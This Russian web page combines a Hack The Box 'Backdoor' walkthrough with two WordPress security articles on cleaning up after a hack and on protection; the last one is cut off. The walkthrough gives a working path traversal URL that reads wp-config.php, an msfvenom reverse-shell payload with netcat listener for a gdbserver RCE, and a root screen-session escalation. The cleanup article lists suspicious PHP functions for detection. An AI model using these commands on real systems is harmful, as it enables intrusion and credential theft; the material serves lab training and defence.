Вордпресс взлом: Взлом сайта WordPress. Как взломать WordPress в 2022?

Содержание

Взлом сайта WordPress. Как взломать WordPress в 2022?

В этой статье мы рассмотрим прохождение уязвимой машины Backdoor Hack The Box, в рамках которой будем взламывать сайт на WordPress. Мы найдем уяз­вимые пла­гины, будем эксплуатировать уяз­вимость Path Traversal, научимся использовать Burp и повышать при­виле­гии в сис­теме с помощью поль­зователь­ского скрипта.

Еще по теме: Взлом сайта на Django

Лучше подключаться к машине HTB с помощью VPN. И желательно не делать это со своего личного компа, на котором хранится чувствительная информация.

Для начала до­бав­им IP-адрес машины в /etc/hosts:

10.10.11.125    backdoor.htb

Начнем со сканирования портов. Это стан­дар­тная операция при любом пентесте. Сканирование портов позволит определить, какие служ­бы на машине при­нима­ют соеди­нение.

Для этого отлично подходит популярный сканер Nmap. Следующий скрипт улучшит резуль­таты сканирования:

#!/bin/bash

ports=$(nmap -p- —min-rate=500 $1 | grep ^[0-9] | cut -d ‘/’ -f 1 | tr ‘\n’ ‘,’ | sed s/,$//)

nmap -p$ports -A $1

Он дей­ству­ет в два эта­па. Пер­вый про­изво­дит­ просто быс­трое ска­ниро­вание, вто­рой — глубокое ска­ниро­вание, используя име­ющиеся скрип­ты (опция —A)

Работа скрип­та Nmap

Сканер нашел два откры­тых пор­та:

  • 80 — веб‑сер­вер Apache 2.4.41;
  • 22 — служ­ба OpenSSH 8.2p1.

SSH сме­ло про­пус­каем, там делать нечего.

Справка: брутфорс учеток

У нас пока нет учет­ных дан­ных, поэтому нет смыс­ла в анализе служ­б, которые как правило тре­буют авто­риза­ции (нап­ример, SSH). Единс­твен­ное, что можно сделать на данном этапе — перебрать пароли брут­ом, но уязвимые машины с Hack The Boxt практически всегда имеют другие решения. В реальности таких вари­антов может не быть, но можно всегда использовать социальную инженерию.

Начнем с изучения веб‑сер­вера. Результат сканирования Nmap указывает на WordPress 5.8.1.

Глав­ная стра­ница HTB Backdoor

Кста­ти, такую информацию можно можно получить, запустив инструмент whatweb.

whatweb http://backdoor. htb

Сканирование сайта WordPress инструментом whatweb

При взломе сайтов WordPress стоит начинать с ути­литы wpscan. Инструмент позволяет обна­ружить устаревшие и зачастую уяз­вимые вер­сии движка WordPress, установленных плагинов и тем, а так­же получить спи­сок учеток с последующим брутом.

Перед началом использования, стоит зарегис­три­ровать­ся на сай­те и получить токен для API.

Зачастую уяз­вимос­ти при­сутс­тву­ют в установленных пла­гинах, поэто­му я начал с их перебора (параметр -e ap), с агрессив­ным режимом (параметр —plugins-detection aggressive) и установил 100 потоков (параметр -t 100).

wpscan —url http://backdoor.htb/ -e ap —plugins-detection aggressive -t 100

Об­наружен­ные пла­гины на сайте WordPress

Пот­ратив нес­коль­ко минут, мы получа­ем отчет, в котором отме­чены два пла­гина. Об уяз­вимос­тях ничего не говорится, но в ebook-download не про­индекси­рован каталог, что поз­воля­ет прос­мотреть его содер­жимое.

Со­дер­жимое катало­га ebook-download

Из фай­ла readme.txt узна­ем вер­сию пла­гина — 1.1. Стран­но, ведь ска­нер отоб­разил 1.5.

Со­дер­жимое фай­ла readme.txt

Пытаемся найти извес­тные уяз­вимос­ти и экс­пло­иты для ebook-download 1.1 и находим PoC.

Справка: поиск готовых эксплоитов

При пен­тесте луч­ше все­го искать экс­пло­иты в Google, пос­коль­ку этот поис­ковик заг­лядыва­ет и в лич­ные бло­ги, и в самые раз­ные отче­ты. Уско­рят дело спе­циали­зиро­ван­ные сайты для поиска уязвимостей вро­де Exploit-DB — там час­то мож­но обна­ружить под­ходящие вари­анты. Если вы работа­ете в спе­циали­зиро­ван­ной ОС вро­де Kali Linux, то эта база у вас уже есть и для поис­ка мож­но исполь­зовать ути­литу

searchsploit.

 

Экс­пло­ит для взлома сайта WordPress

Уяз­вимость и экс­пло­ит очень прос­тые. Это path traversal, то есть воз­можность обра­щать­ся к родитель­ско­му катало­гу ( ../) при ука­зании пути к фай­лу. Три таких шага, и мы выбира­емся в кор­невую дирек­торию WordPress, где можем про­читать файл с кон­фигура­цией. Дела­ется это одним зап­росом:

http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php

Со­дер­жимое фай­ла wp-config.php

 

Здесь хра­нят­ся учет­ные дан­ные для под­клю­чения к базе дан­ных. Пер­вая идея — поп­робовать эти учет­ные дан­ные для логина по SSH (не выш­ло) и дос­тупа к панели адми­нис­три­рова­ния WordPress, рас­положен­ной в катало­ге /wp-admin/. Авто­ризо­вать­ся на сай­те так­же не выш­ло.

Ошибка авторизации WordPress

Тог­да мы можем поис­кать дру­гие инте­рес­ные фай­лы и получить боль­ше информа­ции с сер­вера. Я исполь­зовал спи­сок с такими фай­лами и пот­ратил мно­го вре­мени на их прос­мотры, ведь мы можем про­читать поч­ти все, для чего хва­тает при­виле­гий. И ничего инте­рес­ного, кро­ме фай­ла:

/proc/self/cmdline

Со­дер­жимое фай­ла /proc/self/cmdline

Фай­ловая сис­тема /proc — это спе­циаль­ная ФС, которая есть во мно­гих сов­ремен­ных UNIX-сис­темах.

В ней мож­но най­ти мас­су полез­ной информа­ции в тек­сто­вом виде.

Внут­ри катало­га /proc — огромное чис­ло дру­гих катало­гов с циф­ровыми наз­вани­ями. Имя каж­дого такого катало­га соот­ветс­тву­ет иден­тифика­тору работа­юще­го в сис­теме про­цес­са (PID). А файл /proc/[pid]/cmdline содер­жит аргу­мен­ты коман­дной стро­ки, с которы­ми был запущен про­цесс. Иден­тифика­тор self ука­зыва­ет на текущий про­цесс.

Пос­ле этой наход­ки у меня воз­никла идея про­верить аргу­мен­ты коман­дной стро­ки всех про­цес­сов, вдруг какому‑то из них были переда­ны учет­ные дан­ные. С помощью Burp Intruder мож­но переб­рать иден­тифика­торы. Это лег­ко сде­лать, ука­зав Numbers в качес­тве типа наг­рузки и про­межу­ток перебо­ра от 0 до 10 000 с шагом 1.

Burp Intruder — Positions

 

Burp Intruder — Payloads

 

Ре­зуль­таты перебо­ра

Учет­ных дан­ных не находим, зато отме­чаем, что на пор­те 1337 запущен gdbserver. Мы не зна­ем вер­сии, поэто­му поп­робу­ем най­ти прос­то самый новый экс­пло­ит.

Пер­вая же ссыл­ка в Google наводит нас на скрипт, который экс­плу­ати­рует RCE-уяз­вимость в gdbserver 9.2. Что­бы вос­про­извести это, сге­нери­руем файл с наг­рузкой при помощи MSFvenom:

msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.73 LPORT=4321 PrependFork=true -o rev.bin

За­тем с исполь­зовани­ем netcat соз­дадим лис­тенер для при­ема бэк­коннек­та.

Справка: реверс-шелл

Об­ратный шелл — это под­клю­чение, которое акти­виру­ет ата­куемая машина, а мы при­нима­ем и таким обра­зом под­клю­чаем­ся к ней, что­бы выпол­нять коман­ды от лица поль­зовате­ля, который запус­тил шелл. Для при­ема соеди­нения необ­ходимо соз­дать на локаль­ной машине listener, то есть «слу­шатель».

В таких слу­чаях при­годит­ся rlwrap — readline-обо­лоч­ка, которая в чис­ле про­чего поз­воля­ет поль­зовать­ся исто­рией команд. Она обыч­но дос­тупна в репози­тории дис­три­бути­ва.

В качес­тве самого лис­тенера при этом мож­но исполь­зовать широко извес­тный netcat.

rlwrap nc -lvp [port]

Для это­го выпол­ним такую коман­ду:

rlwrap -cAr nc -lvnp 4321

И запус­тим экс­пло­ит.

Вы­пол­нение экс­пло­ита

 

Бэк­коннект от сер­вера

По­луча­ем инте­рак­тивную TTY-обо­лоч­ку и чита­ем пер­вый флаг — поль­зователь­ский.

python3 -c «import pty;pty.spawn(‘/bin/bash’)»

Флаг поль­зовате­ля

Для зах­вата фла­га рута нам понадо­бит­ся повысить при­виле­гии в сис­теме. Самые оче­вид­ные шаги для это­го — про­верить нас­трой­ки sudoers, при­ложе­ния с выс­тавлен­ным битом SUID, прос­лушива­емые на локаль­ном хос­те пор­ты и спи­сок запущен­ных при­ложе­ний. Везет с пос­ледним пун­ктом. Мы находим работа­ющий в сис­теме поль­зователь­ский скрипт.

Спи­сок запущен­ных про­цес­сов

На хос­те каж­дую секун­ду запус­кает­ся коман­да find:

find /var/run/screen/S-root/ -empty -exec screen -dmS root

Ес­ли она находит про­цесс screen, то выпол­няет дей­ствие exec, что при­ведет к запус­ку screen в авто­ном­ном режиме (при­чем запущен­ном от име­ни супер­поль­зовате­ля).

То есть мы можем запус­тить screen и под­клю­чить­ся ко вто­рому, запущен­ному коман­дой find при­виле­гиро­ван­ному про­цес­су.

export TERM=xterm

screen -x root/root

Это дает нам при­виле­гиро­ван­ный шелл.

Флаг рута

Сайт WordPress взломан. Ма­шина зах­вачена!

Полезные ссылки:

  • Как искать уязвимости сайта
  • Как взломать сайт с помощью SQLMap

2 Примера взлома и лечения Вордпресс

Вы не ожидаете этого, и затем это — Бум! — случается. Ваш сайт взломали. Это может случиться с каждым, и однажды это случилось со мной.

В одном случае IP, на котором находился сайт, был занесен в списки вредоносных и е-мейлы не доходили до адресатов. В другом случае хостинг изолировал сайт и отключил возможность отправлять е-мейлы.

В случае взлома страдает не только зараженный сайт, но и другие сайты на том же IP, все сайты теряют репутацию у поисковиков.

Компьютеры посетителей оказываются под угрозой заражения. Настоящий кошмар.

В этой статье вы узнаете, как найти заражение и удалить его с сайта, и как удалить сайт из списков вредоносных сайтов.

Содержание:

  1. Как хакеры взламывают сайты
  2. Что случилось с сайтами
  3. Как хакеры взламывают сайты
    • Подбор логина и пароля
    • Устаревшая версия ПО
    • Бэкдоры
  4. Базовые требования к безопасности сайта
  5. Типичный взлом сайта
    • Фармацевтические взломы
    • Вредоносные редиректы
  6. Тестирование и очистка сайта после взлома
  7. Сервисы проверки сайта на наличие вредоносного ПО
  8. Удаление вредоносного кода
  9. Обновите ПО, смените пароли, ключи и соли
  10. Как удалить сайт и IP из черных списков
  11. Плагины для очистки сайта

Как хакеры взламывают сайты

Существует много способов взломать сайт. Простые способы — подбор логина и пароля и известные уязвимости в устаревшем ПО, описание которых находится в открытом доступе. Более сложные — бэкдоры, фишинг, xss-атаки, sql-инъекции и многие другие.

В данный момент на Вордпрессе работает более 43% всех сайтов в Интернете, это более 100 млн. сайтов. Около 65% всех сайтов, использующих CMS, используют Вордпресс. Такая популярность привлекает хакеров, то есть, если они найдут какую-то уязвимость в Вордпресс, они смогут получить тот или иной контроль над большим количеством сайтов.

Хакеры создают ботов, которые автоматически обходят сотни тысяч сайтов и сканируют их на наличие устаревшего ПО, описание уязвимостей которого находится в открытом доступе. Когда бот находит сайт с устаревшим софтом, он использует имеющуюся у него методику взлома этого ПО, отсылает сообщение хакеру и идет дальше.

Обычно после взлома взломщики публикуют свою рекламу на сайте, начинают рассылать спам по своим базам или спискам подписчиков взломанного сайта, или взломанный сайт работает в качестве редиректа посетителей на сайты хакеров.

Тогда ссылка на взломанный сайт появляется в интернет-спаме, поисковики это видят и понижают сайт в поисковой выдаче.

Хакеры не используют свои сайты для рассылки спама или для создания сети редиректов на свои сайты, потому что их сайты попадут в спам-фильтры и под санкции поисковых систем.

Вместо этого они взламывают чужие сайты и используют их. После того, как взломанные сайты попадают в фильтры и под санкции, хакеры оставляют эти сайты, взламывают другие и пользуются ими.

Что случилось с сайтами

На первом сайте хакеры взломали устаревшую версию Вордпресс. Хотя на сайте были сложные логин и пароль, на нем не был установлен плагин безопасности, который мог бы предупредить об изменении в файлах.

На втором сайте хакеры создали бэкдор, создали еще одного пользователя, опубликовали несколько статей со ссылками на что-то фармацевтическое и начали рассылать спам по своим базам.

На первом сайте удалось найти инфицированные файлы и вылечить их, на втором сайте сделали бэкап и восстановили сайт до состояния, которое было до заражения.

На обоих сайтах после восстановления были заменены пароли к сайту, FTP, хостингу и ключи и соли.  

Как хакеры взламывают сайты

4 основных способа, которыми хакеры взламывают сайты:

  • Слабые пароли
  • Устаревшее ПО
  • Небезопасные темы и плагины
  • Уязвимости в ПО хостинга

Существует много других способов, но эти способы самые распространенные.

  • Топ-6 уязвимостей WordPress

Подбор логина и пароля

По умолчанию в Вордпресс нет ограничений на количество попыток ввести логин и пароль. Если вы оставите как есть, хакер может пробовать подбирать правильную комбинацию неограниченное количество раз. Это называется brute force attack, атака грубой силой или атака методом перебора паролей.

Вы можете ограничить количество попыток авторизации с помощью плагина, например Login LockDown. Еще один способ — перенесите страницу авторизации на новый адрес, например сайт.ru/login.

  • Как изменить имя пользователя Вордпресс
  • 2 Способа изменить страницу входа в админку Вордпресс
  • Как установить пароль на wp-login. php (wp-admin)

Устаревшая версия ПО

Описания уязвимостей устаревших версий Вордпресс, плагинов и тем находятся в Интернете. У ботов есть эти описания. Когда они находят сайт с устаревшей версией ПО, они взламывают этот сайт по уже имеющемуся алгоритму.

Чтобы обезопасить сайт от таких атак, всегда используйте последнюю версию софта.

  • Почему у вас должна быть последняя версия Вордпресс
  • Ручное и автоматическое обновление Вордпресс
  • Как скрыть версию Вордпресс, плагинов и тем

Бэкдоры

Хакер сохраняет файл со специальным скриптом на сервере, который позволяет ему заходить на сайт в любое время, при этом хакер не пользуется стандартной страницей входа, а заходит на сайт через созданный им бэкдор.

Чтобы замаскировать созданный файл, хакеры называют его так, чтобы он выглядел как часть ядра Вордпресс, например, users-wp.php, php5.php, sunrise.php или что-нибудь подобное.

Если у вас не установлен какой-нибудь плагин, который предупреждает об изменениях в файлах, может быть довольно трудно определить, что вредоносный файл был добавлен. Есть несколько признаков, которые могут дать понять, что сайт был взломан.

Если вы открываете фронтэнд или бэкэнд сайта, и видите сообщение в браузере, что посещение этого сайта может быть небезопасно, то ваш сайт может быть взломан.

Если вы видите такое сообщение, то ваш сайт мог быть взломан.

Другой признак — антивирус на компьютере показывает сообщение, что посещение этого сайта может быть опасно. Бэкдоры могут запускать вредоносный код, или вирусы, например трояны, когда посетитель заходит на сайт.

Еще один признак — е-мейлы, которые вы отправляете с сервера, возвращаются обратно с SMTP ошибкой 550. От некоторых серверов, которым вы отправляли е-мейл может вернуться более подробное описание проблемы. Например, ссылка на сайты, которые поместили ваш сайт или ваш IP в список сайтов, содержащих вредоносное ПО.

  • Как найти и удалить бэкдоры на Вордпресс сайте

Базовые требования к безопасности сайта

Эти требования — необходимый минимум для безопасности сайта.

  • Регулярно обновляйте Вордпресс, скрипты, плагины и темы.
  • Используйте сложные логины и пароли.
  • Установите плагин для ограничения попыток авторизации.
  • Выбирайте плагины и темы от проверенных авторов.
  • Используйте надежный хостинг.
  • Настройте автоматический бэкап всех файлов и базы данных.

Читайте Минимальная безопасность сайта.

Типичные взломы сайтов

Хакеры взламывают сайты для рассылки спама, редиректа на свои сайты, кражи личных данных и использования сервера в качестве хранилища какой-нибудь информации или файлообменника. В большинстве случаев сайты взламываются автоматически хакботами.

Фармацевтические взломы

Если вы видите на своем сайте ссылки на другие сайты, которые вы не добавляли, или вас или ваших посетителей перенаправляет на другие сайты, это называется фармацевтические или фарма хаки.

Текст или ссылки указывают на полулегальные спам сайты, которые продают поддельные часы, кошельки, Виагру и тому подобное.

Хакер добавляет скрипты в файлы сайта, обычно в хедер, иногда в другие части страниц. Эти ссылки или текст могут быть скрыты или незаметны для посетителей, но видны поисковым системам.

Введите в поисковике запрос site:ваш-сайт.ru, и посмотрите, как ваш сайт выглядит в поиске.

В поисковой выдаче вы должны видеть только название страниц и их описание. Если вы видите что-то подобное, значит, ваш сайт взломали.

Попробуйте вставить ссылку на какую-нибудь страницу вашего сайта в Фейсбук, ВКонтакте или Вотсапп. Если вы увидите что-то постороннее в описании или названии, это значит, что ваш сайт взломан.

Вредоносные редиректы

Хакер вставляет скрипт в файл .htaccess или другие главные файлы сайта, который перенаправляет посетителей на другие страницы или другой сайт. Это называется вредоносный редирект.

Не заметить такой взлом очень сложно, потому что вместо загрузки вашего сайта загрузится другой сайт.

Иногда редирект может быть не таким очевидным, если взломанный файл использует стили вашей темы. Тогда вы увидите большое количество рекламы на странице, которая выглядит похожей на ваш сайт.

Редиректы могут быть настроены только с некоторых страниц сайта или со всего сайта целиком.

Тестирование и очистка сайта после взлома

Перед тем, как вы начнете что-то делать, сделайте полный бэкап всего сайта и базы данных. Даже несмотря на то, что сайт взломан, позже вам может понадобиться какая-то информация.

  • Бэкап Вордпресс

Чтобы не допустить заражения других сайтов, некоторые хостинги могут отключить или удалить ваш сайт, когда узнают, что сайт взломан, особенно на дешевых тарифах виртуальных хостингов.

Если логи событий находятся не в основной папке сайта, то сохраните их на компьютер, так как они хранятся на сервере несколько дней, после чего заменяются новыми.

После того, как вы сохранили бэкап и логи на компьютер, можно начинать лечение сайта.

  • Как найти следы взлома в логах сервера

Проверьте сайт в этих сервисах:

Даже если вы точно знаете, что сайт взломали, проверьте его еще раз в этих сервисах. Вы можете найти еще какие-то вирусы, кроме тех, которые вы уже нашли.

  • Unmask Parasites — довольно простой сервис для проверки сайта. Первый шаг, чтобы определить, был ли сайт взломан.
  • Sucuri Site Check — хороший сервис для поиска заражений на сайте. Показывает, внесен ли сайт в списки вредоносных сайтов. На данный момент 9 списков.
  • Norton Safe Web – сканер сайта от Norton.
  • Quttera – сканирует сайт на наличие вредоносного ПО.
  • 2ip — проверяет на вирусы и включение в черные списки Яндекса и Гугла.
  • VirusTotal – крутейший сервис для сканирования сайтов, использует более 50 разных сканеров — Касперского, Dr.Web, ESET, Yandex Safebrowsing и других. Можно просканировать сайт, IP адрес или файл.
  • Web Inspector – еще один хороший сервис, проверяет сайт на наличие червей, троянов, бэкдоров, вирусов, фишинга, вредоносного и подозрительного ПО и так далее. В течение пары минут генерирует довольно детальный отчет.
  • Malware Removal – сканирует сайт на наличие вредоносного ПО, вирусов, внедренных скриптов и так далее.
  • Scan My Server – сканирует сайт на вредоносный софт, SQL внедрения, XSS и так далее. Для использования требуется бесплатная регистрация. Довольно детальные отчеты приходят на е-мейл раз в неделю.

Проверьте сайт во всех сервисах, так как они сканируют немного по-разному и находят разные типы инфекций. Также просканируйте свой компьютер.

В статье Как проверить и вылечить от вирусов Вордпресс сайт описан способ найти вредоносный код в файлах сайта, используя команды в SSH терминале.

Начните с поиска файлов, измененных в течение последних 2-х дней:

find /путь/к/вашему/сайту/папка/ -mtime -2 -ls

Замените /путь/к/вашему/сайту/папка/ на путь к вашей папке, и пройдите поиском по каждой папке.

Если вы ничего не нашли, увеличьте поиск до 5 дней:

find /путь/к/вашему/сайту/папка/ -mtime -5 -ls

Если вы снова ничего не нашли, увеличивайте интервал поиска, пока не найдете изменения. Не забывайте, что обновления ПО тоже изменения.

Еще одна команда, которую вы можете использовать для поиска — «grep». Эта команда поможет найти вредоносный код, который добавил хакер.

После того, как вы нашли файлы, в которых хакер сделал изменения, вы можете попробовать найти в них повторяющиеся фрагменты, например, base64 или hacker was here.

grep -ril base64 *

Замените base64 на повторяющееся сочетание, которое вы нашли в измененных файлах. Результат покажет вам список файлов, в которых встречается это сочетание.

Хакеры часто используют эти функции:

  • base64
  • str_rot13
  • gzuncompress
  • eval
  • exec
  • create_function
  • system
  • assert
  • stripslashes
  • preg_replace (/e/)
  • move_uploaded_file

Если вы хотите увидеть содержание этих файлов, используйте этот запрос:

grep -ri base64 *

Замените base64 на значение, которое вы нашли в измененных файлах.

Более аккуратный запрос может быть таким:

grep --include=*.php -rn . -e "base64_decode"

Результат этого запроса показывает номера строк, в которых содержится сочетание «base64_decode», в тех файлах, которые заканчиваются на .php.

Более простой способ:

Скопируйте сайт с сервера, удалите все что можно безопасно удалить, заархивируйте целиком или разделите на архивы и проверьте архивы на VirusTotal или 2ip. Также можно проверить на компьютере антивирусом. Перенесите все зараженные файлы из архива в отдельную папку.

После того, как вы нашли файлы с внедренным код, их можно восстановить или удалить.

Удаление вредоносного кода

  • Если вы нашли файл бэкдора, в котором находится только скрипт хакера, удалите этот файл.
  • Если вы нашли вредоносный код в файле Вордпресс, темы или плагина, удалите этот файл и скачайте новый из репозитария Вордпресс или с сайта разработчика.
  • Если вы нашли вредоносный код в файле, который вы создавали, удалите хакерский код и сохраните файл.
  • Возможно, у вас в бэкапе есть незараженная версия сайта, вы можете восстановить сайт из старой версии. После восстановления обновите Вордпресс, плагины и тему, смените пароль и установите плагин безопасности.

Очистите сайт и просканируйте его еще раз на интернет сервисах проверки.

Обновите ПО, смените пароли, ключи и соли

После того, как вы удалили вредоносный код, обновите Вордпресс, плагины и темы. Смените пароли на сайте и на хостинге. Подумайте о смене пароля к е-мейлу и базе данных (в файле wp-config.php и на хостинге).

Смените ключи и соли, это сделает все cookies, которые хранятся в браузерах пользователей, в том числе хакеров, недействительными для авторизации на сайте.

Генератор ключей и солей находится на сайте Вордпресс. Скопируйте новые ключи и вставьте их в файл wp-config в этом месте:

Перед изменением файла wp-config сделайте его бэкап. Сохраните файл, закачайте обратно на сервер.

Как удалить сайт и IP из черных списков

После того, как вы очистили сайт, он все еще может находиться в списках сайтов, содержащих вредоносное ПО или в спам списках. Сначала нужно узнать, на каких сайтах ваш сайт или IP занесены в черный список.

Здесь вы можете узнать, занесен ли ваш сайт в списки malware или phishing сайтов Гугл.

https://transparencyreport.google.com/safe-browsing/search?url=ваш-сайт.ru

Замените ваш-сайт.ru на ваш адрес.

Проверьте сайт на сервисах Unmask Parasites, Spamhaus и 2ip.ru. Спамхаус показывает на каких сайтах IP сайта внесен в списки вредоносных, так что вы можете узнать, на каких сайтах вам нужно перенести IP из черных списков.

http://www.spamhaus.org/query/ip/123.45.67.890

Замените 123.45.67.890 на IP сайта.  Узнать IP.

Spamhaus покажет сайты, которые занесли ваш IP в список вредоносных.

Когда какой-то сайт заносит IP в черный список, он отображается красным.

Откройте красные ссылки в новом окне и следуйте инструкциям. У всех сайтов инструкции могут быть разными, поэтому читайте внимательно.

Обычно запрос проверки делается в несколько кликов, и занимает около 2 дней. Некоторые сайты не предупреждают о переносе IP из черного списка в белый список, поэтому вы можете вернуться на Спамхаус через несколько дней, и проверить снова.

На некоторых сайта можно запросить проверку только один раз, поэтому убедитесь, что сайт полностью очищен, иначе ваш IP может остаться в черных списках надолго.

  • Как очистить сайт от вирусов и удалить его из черных списков

Плагины, которые помогут очистить сайт

Если вы хотите найти хак с помощью плагина, попробуйте использовать эти плагины:

  • Anti-Malware Security and Brute-Force Firewall
  • NinjaScanner
  • Quttera Web Malware Scanner
  • Antivirus
  • WP Antivirus Site Protection

Некоторые большие плагины могут помочь найти место взлома, но обычно бесплатные версии предназначены только для защиты сайта.

Если ваш сайт еще не взломали, установите один из этих плагинов:

Sucuri Security

В платной версии Sucuri предлагает защиту самого высокого класса — файрвол на уровне DNS, который сканирует каждый запрос к сайту. Ускорение сайта с помощью кеширования и подключения к собственному CDN, и бесплатное восстановление сайта, если сайт был взломан. Также сервис проверяет, что сайт не занесен в черные списки.

В бесплатной версии плагин сравнивает файлы ядра Вордпресс и файлы в репозитории Вордпресс, ведет логи событий, имеет несколько основных настроек безопасности. В случае появления подозрительной активности плагин посылает сообщение на е-мейл.

У плагина есть главная панель, в которой сообщается, что файлы на сервере соответствуют файлам в репозитарии Вордпресс, на сайте не обнаружено вредоносного кода, сайт не занесен в черные списки и показаны логи событий. Это очень удобный инструмент для наблюдения за безопасностью сайта.

  • Подробное описание Sucuri Security

Wordfence

Один из самых известных и мощных плагинов безопасности Вордпресс. Платная и бесплатная версии обнаруживают вредоносный код и защищают сайт практически от всех видов угроз. База данных плагина постоянно обновляется, поэтому все новые угрозы попадают в базу данных. Через 30 дней база обновляется в бесплатной версии.

В Wordfence есть функция обнаружения изменений или добавления файлов. Когда существующий файл обновляется или добавляется новый файл, Вордфенс сообщает об этом и предлагает отменить изменение или удалить файл.

В Вордфенсе есть функция сканирования файлов на своем сервере, встроенный файрвол на уровне сайта и множество других функций.

iThemes Security

iThemes Security — мощный плагин из тройки лидеров. У него есть база с последними хаками, бэкдорами и другими угрозами.

Бесплатная версия хорошо защищает чистый сайт, но если вы хотите знать, когда файлы изменялись и делать подробный скан сайта, вам нужно купить премиум версию.

Еще одна крутая функция этого плагина — бэкап сайта. Если вы узнали, что сайт был взломан, вместо поиска взлома вы можете восстановить более раннюю версию сайта.

All in One WP Security & Firewall

Большой бесплатный плагин со множеством настроек, имеет встроенный файрвол, защищает файлы сайта и базу данных. В платной версии есть сканер сайта на наличие вредоносного ПО.

Проверяет файлы и базу данных, сообщает, были ли какие-то изменения, меняет стандартную страницу авторизации, скрывает версию Вордпресс, меняет префикс базы данных и еще десятки других функций. Ко всем функциям есть подсказки — описания.

Плагин скорее предназначен для предупреждения заражений, чем для лечения, поэтому его лучше устанавливать на свежий или вылеченный сайт. На мой взгляд, лучший бесплатный плагин.

Security Ninja

Один из самых простых, но мощных премиум плагинов безопасности. В бесплатной версии проверяет сайт на наличие типичных уязвимостей и предлагает инструкции по устранению этих уязвимостей.

В платной версии добавляется сканер ядра, который сравнивает файлы вашей установки Вордпресс с оригинальными файлами на сайте Вордпресс, сканер сайта на наличие вредоносного ПО и облачный файрвол, в который добавляются IP, распространяющие вредоносное ПО и спам.

Весь плагин можно настроить за 15 минут. Плагин платный, но имеет лайф-тайм лицензию.

  • Подробное описание Security Ninja Pro
  • Как усилить защиту Security Ninja Pro до лучших премиум-плагинов безопасности

VaultPress

Плагин безопасности и бэкап плагин в одном от Automattic, часть разработчиков которого являются разработчиками Вордпресс. Есть бесплатная и премиум версия.

Регулярные бэкапы дают возможность восстановить сайт в случае взлома. Дополнительные инструменты безопасности защитят ваш сайт, если обновитесь до премиум версии.

В премиум версии есть функция ежедневного сканирования сайта на наличие вредоносного кода, вирусов, троянов и прочей заразы. Также помогает очищать сайт после заражения.

Theme Check

Этот плагин проверяет код на правильность в теме, которую вы используете. Он сравнивает код темы на соответствие последним стандартам Вордпресс. Если что-то не соответствует этим стандартам или выглядит подозрительным, плагин сообщает об этом.

Если вы выбираете тему для использования, проверьте ее этим плагином.

Plugin Security Scanner

Плагин проверяет темы и плагины на наличие уязвимостей, описание которых он берет в базе WPScan Vulnerability Database.

Плагин сканирует сайт раз в 24 часа, и посылает сообщение администратору сайта, если находит уязвимость в теме или плагине.

Для работы плагина нужно зарегистрироваться в базе WPScan Vulnerability и получить токен, который вставляется в настройках плагина.

Plugin Check

Аналогично с предыдущим плагином, этот плагин проверяет установленные плагины на соответствие стандартам Вордпресс.

Плагин скорее проверяет код на правильность, чем на наличие вредоносного ПО, но это уже хорошо. Большое количество взломов происходит по причине неправильного кода.

Хотя это хороший плагин, но он давно не обновлялся.

  • Лучшие плагины защиты Вордпресс

Восстанавливать сайт труднее, чем настроить защиту сайта до взлома. Если ваш сайт еще не взломали, установите один из этих плагинов и читайте Руководство по безопасности Вордпресс.

Если вы не хотите заниматься этими настройками вручную, приглашаю вас на курс Безопасность Вордпресс за 2 вечера. Настроил и забыл. В этом курсе вы настроите автоматическую безопасность Вордпресс с помощью плагинов и нескольких ручных настроек.

Защита будет обновляться автоматически по мере появления новых угроз и по мере появления новых версий ПО. Настроил и забыл →.

Читайте также:

  1. Чек-лист: Что делать, если сайт взломали
  2. Как проверить и вылечить от вирусов Вордпресс сайт
  3. Как найти и удалить бэкдоры на Вордпресс сайте
  4. Как найти следы взлома в логах сервера
  5. Как зайти в админку Вордпресс после взлома сайта

Надеюсь, статья была полезна. Оставляйте комментарии.

Взлом WordPress. Защита сайтов на Вордпрессе. Настройка плагина iThemes Security

По статистике 80%  сайтов на WordPress когда-либо ранее были взломаны. Около 30% сайтов на этом движке в данный момент находятся под управлением сторонних лиц. 90% владельцев сайтов не знают о взломе 3 месяца и более.

Данная статья основана на собственном опыте восстановления сайтов после взлома и попыток предотвращения несанкционированного доступа к ним.

Сразу скажу, что я не являюсь экспертом по безопасности, все наработки только личного плана и базируются на перманентной борьбе со зловредами.

Чтобы не быть голословными, посмотрите статистику взломанных в настоящее время сайтов наиболее известных хакерских групп.

Группировка NeT.Defacer:

Группировка w4l3XzY3:

И таких бандформирований хаккеров — сотни. А есть еще и одиночки. Кроме того далеко не все хакеры гордо заявляют о взломах — в большинстве случаев они просто эксплуатируют тихонько посторонний сайт: рассылают через него спам, атакуют DDOS-ом какие — то ресурсы, перенаправляют трафик на нужные ресурсы. Некоторые ставят ссылки со сломанных сайтов на продвигаемые ресурсы. В принципе хоть майнить криптовалюту можно — благо js скрипты майнеров известны уже лет 6-7.

Чтобы не допустить подобных вакханалий, нужно хотя бы кратко знать об основных способах взлома сайтов.

Методы взлома сайтов

Всего существует 2 основных способа скомпрометировать сайт — взлом со стороны хостера и взлом непосредственно самого сайта.

Первый способ был широко распространен ранее. Лет 5-8 назад многие хостеры практически стонали, когда, используя уязвимости хостинга через один аккаунт шаред хостинга  были взломаны все сайты, размещенные на сервере и большинство аккаунтов пользователей хостинга были скомпрометированы.

Сейчас, как правило, у крупных хостеров ломается единичный аккаунт и заражаются сайты размещенные на нем. Доступа к иным аккаунтам у взломщиков нет.

Второй способ взлома — взламывается непосредственно сайт. Здесь взлом можно подразделить на подбор доступа к системе аутентификации (брутфорс) и на взлом сайта, используя его уязвимости.

Как взломать WordPress сайт

Есть статистика, что только треть WordPress сайтов ломается через уязвимости движка, когда пользователи его не обновляют годами. Большинство взломов Вордпресса осуществляется через уязвимости плагинов и тем. Особое опасение вызывают плагины, размещенные в теме — они практически никогда не обновляются и служат прекрасным полигоном для получения доступа к сайту.

Еще одной особенностью, облегчающей взлом Вордпресса является установка «бесплатных» профессиональных тем и плагинов, скачанных в интернете, а не из репозитория самого Вордпресса или продающих сайтов. Некоторая часть из них уже несет в своем составе бэкдоры, либо возможности их установить. Никогда не пользуйтесь бесплатными темами из интернета.

Одним из способов взлома сайта является его «проверка» на известные уязвимости. Существуют библиотеки этих уязвимостей, которые постоянно пополняются. Потом, по этим библиотекам идет проверка сайта.

Здесь хорошо видно как по библиотеке ищутся уязвимые плагины (1), при этом атака идет со множества IP, а время атаки примерно совпадает (2).

